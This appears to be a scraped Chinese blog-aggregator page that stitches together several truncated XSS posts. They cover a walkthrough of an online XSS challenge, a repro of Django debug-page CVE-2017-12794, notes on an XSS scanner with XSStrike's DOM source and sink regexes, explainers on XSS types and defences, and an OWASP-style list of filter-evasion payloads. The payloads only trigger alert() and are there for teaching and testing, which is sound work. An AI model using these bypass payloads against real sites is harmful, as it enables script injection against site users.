xss

xss练习闯关

被刻印的时光 ゝ 提交于 2020-02-26 18:53:30
https://xss.haozi.me/ 0x00 无任何限制 payload如下: <script>alert("liuxixi")</script> 0x01 先输入xxx发现就存在于<textarea></textarea>之前显示,那么我们需要把前后进行闭合,最后才会显示我们输入的内容。 payload如下: </textarea><script>alert("liuxixi1")</script><textarea> 0x02 先输入xxx发现输的内容在双引号内,发现前面有三个双引号,那么肯定是没有闭合。 构造payload。闭合前面的双引号,这里需要注意的是input前面的 < 也要闭合。 payload如下: "><script>alert("liuxixi2")</script><" 0x03 查看后端代码,发现过滤了(),那么我们同样可以用反引号来代替()就行了 payload如下: <script>alert`liuxixi3`</script> 0x05 同样的方法,输入xxx发现输入内容存在于<!-- -->之间,那么我们还是将前后进行闭合,最终显示我们输入的内容。 payload如下: --!><script>alert("liuxixi5")</script><-- 0x06 我们输入前面任意一个payload,发现 > 会变成 _ 符号。

Django debug page XSS漏洞(CVE-2017-12794)

只谈情不闲聊 提交于 2020-02-26 02:11:19
1.创建个用户: ip:8000/create_user/?username=&lt;script&gt;alert(7)&lt;/script&gt; 显示用户已创建。 2.触发漏洞,再次访问 ip:8000/create_user/?username=&lt;script&gt;alert(7)&lt;/script&gt; 3.触发异常: duplicate key value violates unique constraint "xss_user_username_key" DETAIL: Key (username)=(<script>alert(7)</script>) already exists. 4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。 来源: 51CTO 作者: wx5c99daab1f230 链接: https://blog.51cto.com/14259169/2473184

XSS 扫描器成长记

老子叫甜甜 提交于 2020-02-25 23:18:47
作者:w7ay @知道创宇404实验室 时间:2020年2月12日 原文地址: https://paper.seebug.org/1119/ 为了实现自动刷SRC的目标,过年前就开始对w13scan的xss扫描功能进行优化,灵感来源于xray所宣称的基于语义的扫描技术。 之前xss扫描是参考 w3af 中的源码,原理也很简单就是暴力的使用xss的payload进行请求,最后在返回文本中查找关键字,xss payload一般有以下几个部分。 后面我认真的学习了一下 Xsstrike 、 Xray 、 Awvs 中的检测技巧以及检测参数,想将它们的优点和为一体。 XSStrike 先说说 Xsstrike ,里面带有xss扫描和fuzz,但感觉xss扫描的效果也不是太理想。不过它的一些特性还是可以学习的。 DOM XSS Xsstrike的dom扫描,是通过正则来分析敏感函数 sources = r'''document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)(local|session)Storage''' sinks = r'''eval

常见WEB漏洞:HTML5安全与防御

醉酒当歌 提交于 2020-02-25 17:29:24
  常见WEB漏洞:HTML5安全与防御   1、HTML5概述   HTML5 是定义 HTML 标准的最新的版本,5的原因是它是HTML的第五次重大修改,标准于14年10月29日完成。作为HTML的升级版,它有更大的技术集,引入了新的标签、属性、方法和功能等,允许更多样化和强大的网站和应用程序。   比如说新增了<section>, <article>, <nav>, <header>等标签,再比如说新增了现在比较流行的SVG的支持,还有比如新增了Web Storage本地存储等等,更多的HTML5新增的特性就需要大家自己进一步去了解了,具体可以参考:   https://developer.mozilla.org/zh-CN/docs/Web/Guide/HTML/HTML5   安全问题一般都伴随着功能出现,所以HTML5的出现,自然而然伴随着功能就产生一些可以被利用的安全问题或者扩大了原来的一些攻击方法的攻击面或者攻击点;由于HTML5是Web标准,所以一些问题主要是集中在前端安全。   2 、新功能的引入带来的新的攻击   2.1 新标签、属性加入,拓宽攻击方法   新标签、属性的出现,对于前端攻击中基于标签、属性的一些攻击方法,比如XSS,等于多了一些新的黑名单绕过方式。最简单的方式就是特征识别,举个例子:这样一个XSS Payload:   <script

【web安全】浅谈web安全之XSS

假装没事ソ 提交于 2020-02-25 17:28:50
XSS定义   XSS, 即为(Cross Site Scripting), 中文名为 跨站脚本 , 是发生在 目标用户的浏览器 层面上的,当渲染DOM树的过程成发生了 不在预期内 执行的JS代码时,就发生了XSS攻击。 跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。 攻击手段:   1.盗用cookie 获取敏感信息   2.破坏页面结构 插入恶意内容(反射性)   3.利用flash(了解)   4.DDOS(强大 难以防御)     DDOS:分布式拒绝服务攻击(Distributed Denial of Service),简单说就是发送大量请求是使服务器瘫痪。DDos攻击是在DOS攻击基础上的,可以通俗理解,dos是单挑,而ddos是群殴,因为现代技术的发展,dos攻击的杀伤力降低,所以出现了DDOS,攻击者借助公共网络,将大数量的计算机设备联合起来,向一个或多个目标进行攻击。 在技术角度上,DDoS攻击可以针对网络通讯协议的各层,手段大致有:TCP类的SYN Flood、ACK Flood,UDP类的Fraggle、Trinoo,DNS Query Flood,ICMP Flood,Slowloris类等等。一般会根据攻击目标的情况,针对性的把技术手法混合

认识与防御XSS攻击

◇◆丶佛笑我妖孽 提交于 2020-02-25 17:27:07
什么是xss攻击? XSS,即(Cross Site Scripting)中文名称为“跨站脚本攻击”。 XSS的重点不在于跨站攻击而在于脚本攻击。攻击者可以利用 web应用的漏洞或缺陷之处,向页面注入恶意的程序或代码,以达到攻击的目的。 通俗的来说就是我们的页面在加载并且渲染绘制的过程中,如果加载并执行了意料之外的程序或代码(脚本、样式),就可以认为是受到了 XSS攻击。 XSS的危害 通过 document.cookie 盗取 cookie中的信息 使用 js或 css破坏页面正常的结构与样式 流量劫持(通过访问某段具有 window.location.href 定位到其他页面) dos攻击:利用合理的客户端请求来占用过多的服务器资源,从而使合法用户无法得到服务器响应。并且通过携带过程的 cookie信息可以使服务端返回400开头的状态码,从而拒绝合理的请求服务。 利用 iframe、frame、XMLHttpRequest或上述 Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的如发微博、加好友、发私信等操作,并且攻击者还可以利用 iframe,frame进一步的进行 CSRF 攻击。 控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力。 XSS攻击分类 XSS 根据攻击是否持久,可以分为 “反射型XSS”与“存储型XSS”两种。 “反射型XSS

XSS攻击payload大全

六眼飞鱼酱① 提交于 2020-02-25 15:50:12
吐血整理转载请说明。 原文收集于OWASP XSS_Filter_Evasion_Cheat_Sheet 正文: XSS JavaScript injection: <SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT> multiple contexts including html, script string, js and url: javascript:/*--></title></style></textarea></script></xmp><svg/οnlοad='+/"/+/οnmοuseοver=1/+/[*/[]/+alert(1)//'> Image XSS using the JavaScript directive,IE7.0 doesn't support: <IMG SRC="javascript:alert('XSS');"> No quotes and no semicolon: <IMG SRC=javascript:alert('XSS')> Case insensitive XSS attack vector: <IMG SRC=JaVaScRiPt:alert('XSS')> HTML entities: <IMG SRC=javascript:alert("XSS")> both double and

XSS Basic Understanding

大城市里の小女人 提交于 2020-02-22 07:02:32
问题 I'm using Symfony2 / Twig / Doctrine. I'm looking at security on my site and in particular preventing XSS attacks, but I can't see what more I can do. Persistent I use Doctrine and always ensure I make user input safe, refusing HTML, web addresses and email addresses etc. (if applicable, e.g. a comment box). I also use Twig (which I believe escapes output). Reflective My understanding is that anyone could send an email to someone with a link to any website that also injects JavaScript. That

Creating HTML with intentional HTML Injection

∥☆過路亽.° 提交于 2020-02-22 05:54:06
问题 I am a cybersecurity student trying to understand some basic HTML injections. I have been working on this code for a few days and can't understand what I am doing wrong. The code that I have currently does allow for injection, for example if I put <h1>test</h1> into the textbox, it will display test as a header. But if I try <script>alert(1)</script> it won't actually run the script. I have tried setting the value of the text box to "" or with the thought that I could close out that line by

XSS分类

帅比萌擦擦* 提交于 2020-02-21 04:25:55
实验环境:DVWA低级别(火狐浏览器) 实验步骤: 一、反射型XSS漏洞 该漏洞又称非持久性XSS 1.选择反射型XSS,在输入框输入任意参数 2.修改参数的值为:<script>alert(/cxr/)</script>,弹出下面窗口,再次点击无法出现该窗口 二、储存型XSS漏洞 又称持久性XSS漏洞 1.在留言框输入任意值,都会在下面显示 2.在信息栏目中输入:<script>alert(/cxr/)</script>,多次点击一直会存在 3.Dom攻击 1.选择DOM攻击 2.修改参数:<script>alert(/cxr/)</script>,该攻击和发射型攻击一样都是一次性攻击 来源: CSDN 作者: 没有如果ru果 链接: https://blog.csdn.net/cxrpty/article/details/104405462